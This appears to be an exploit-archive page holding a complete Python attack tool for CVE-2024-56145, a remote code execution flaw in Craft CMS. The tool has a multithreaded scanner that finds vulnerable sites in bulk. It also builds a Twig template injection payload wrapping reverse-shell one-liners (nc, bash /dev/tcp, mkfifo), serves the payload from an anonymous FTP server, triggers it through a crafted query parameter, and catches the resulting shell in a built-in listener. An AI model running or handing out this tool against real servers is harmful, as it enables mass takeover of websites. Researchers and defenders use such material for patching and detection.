4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import os
import sys
import uuid
import select
import socket
import warnings
import requests
import threading
import rich_click as click

from rich.console import Console
from alive_progress import alive_bar
from pyftpdlib.servers import FTPServer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.authorizers import DummyAuthorizer
from concurrent.futures import ThreadPoolExecutor

console = Console()
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings(
    "ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)


@click.group(context_settings=dict(help_option_names=["-h", "--help"]))
def cli():
    """
    CVE-2024-56145 Exploit Framework

    Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.
    Thanks to Assetnote for their research and findings:
    https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms

    This tool provides commands to:
    - Check if a target is vulnerable.
    - Exploit the vulnerability using a crafted FTP server and listener.
    """
    pass


@cli.command()
@click.option("-u", "--url", required=False, help="The target URL for checking")
@click.option(
    "-f",
    "--file",
    required=False,
    type=click.Path(exists=True),
    help="File containing a list of URLs",
)
@click.option(
    "-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
    "-o",
    "--output",
    required=False,
    type=click.Path(),
    help="Output file to save results",
)
def check(url, file, threads, output):
    if not (url or file):
        console.print(
            "[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
        )
        return

    targets = ([url] if url else []) + (
        [line.strip() for line in open(file, "r") if line.strip()] if file else []
    )

    with alive_bar(
        len(targets), title="Checking Targets", bar="smooth", enrich_print=False
    ) as bar:
        writer = open(output, "a").write if output else None
        lock = threading.Lock()

        def process_target(target):
            with lock:
                bar()
            result = check_target(target)
            with lock:
                writer(f"{result}\n")

        with ThreadPoolExecutor(max_workers=threads) as executor:
            executor.map(process_target, targets)

        if output:
            writer.__self__.close()


def check_target(target):
    nonce = str(uuid.uuid4())
    try:
        response = requests.get(
            f"{target}?--configPath=/{nonce}", verify=False, timeout=2
        )
        if "mkdir()" in response.text and nonce in response.text:
            console.print(f"[bold green]{target} is vulnerable![/bold green]")
            return f"{target} | VULNERABLE"
        console.print(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
        return f"{target} | NOT VULNERABLE"
    except Exception as e:
        console.print(f"[bold red]Failed to check {target}: {e}[/bold red]")
        return f"{target} | ERROR"


@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=True, help="The target URL for exploitation")
@click.option(
    "-lh", "--lhost", required=True, help="The local host for reverse shell listener"
)
@click.option(
    "-lp",
    "--lport",
    required=True,
    type=int,
    help="The local port for reverse shell listener",
)
@click.option(
    "-px",
    "--payload",
    default="bash",
    type=click.Choice(["nc", "bash", "mkfifo"]),
    help="Payload type to use",
)
def exploit(ftp_host, ftp_port, url, lhost, lport, payload):
    payload_str = generate_payload(payload, lhost, lport)
    root_dir = "./virtual"
    create_virtual_files(root_dir, payload_str)
    threading.Thread(
        target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=True
    ).start()
    threading.Thread(target=start_listener, args=(lhost, lport), daemon=True).start()
    console.print("[bold green]FTP server and listener started[/bold green]")
    trigger_http_request(url, ftp_host, ftp_port)


def generate_payload(payload_type, lhost, lport):
    payload_templates = {
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        "bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
        "mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
    }

    payload = f"{{{{ ['system', '{payload_templates[payload_type]}'] | sort('call_user_func') }}}}"
    console.print(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
    return payload


def create_virtual_files(root_dir, payload):
    try:
        os.makedirs(f"{root_dir}/default", exist_ok=True)
        with open(f"{root_dir}/default/index.twig", "w") as twig_file:
            twig_file.write(payload)
        with open(f"{root_dir}/default/index.html", "w") as html_file:
            html_file.write(payload)
        console.print("[bold green]Virtual files created successfully.[/bold green]")
    except Exception as e:
        console.print(f"[bold red]Failed to create virtual files:[/bold red] {e}")


def start_ftp_server(host, port, root_dir):
    authorizer = DummyAuthorizer()
    authorizer.add_anonymous(root_dir, perm="elradfmw")
    handler = FTPHandler
    handler.authorizer = authorizer
    server = FTPServer((host, port), handler)
    console.print(f"[bold green]FTP server running on {host}:{port}[bold green]")
    try:
        server.serve_forever()
    except Exception as e:
        console.print(f"[bold red]Error starting FTP server:[/bold red] {e}")


def trigger_http_request(url, ftp_host, ftp_port):
    templates_path = f"ftp://{ftp_host}:{ftp_port}"
    console.print(
        f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[bold yellow]"
    )
    try:
        response = requests.get(f"{url}?--templatesPath={templates_path}", verify=False)
        if response.status_code == 200:
            console.print(
                "[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
            )
        else:
            console.print(
                f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
            )
    except Exception as e:
        console.print(f"[bold red]Failed to send HTTP request:[/bold red] {e}")


def start_listener(lhost, lport, timeout=30):
    console.print(f"[bold cyan]Starting listener on {lhost}:{lport}[bold cyan]")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((lhost, lport))
    s.listen(1)
    s.settimeout(timeout)
    try:
        console.print(
            f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
        )
        conn, addr = s.accept()
        console.print(
            f"[bold green]Connection received from {addr[0]}:{addr[1]}[bold green]"
        )
        conn.setblocking(0)
        while True:
            ready, _, _ = select.select([conn, sys.stdin], [], [])
            if conn in ready:
                data = conn.recv(4096).decode(errors="ignore")
                if not data:
                    break
                sys.stdout.write(data)
                sys.stdout.flush()
            if sys.stdin in ready:
                command = sys.stdin.readline().strip()
                conn.sendall((command + "\n").encode())
    except socket.timeout:
        console.print(
            f"[bold red]No connection received within {timeout} seconds.[/bold red]"
        )
    except KeyboardInterrupt:
        console.print("[bold cyan]\nListener stopped by user.[/bold cyan]")
    except Exception as e:
        console.print(f"[bold red]Error: {e}[bold red]")
    finally:
        conn.close()
        s.close()
        console.print("[bold cyan]Listener closed.[/bold cyan]")


if __name__ == "__main__":
    cli()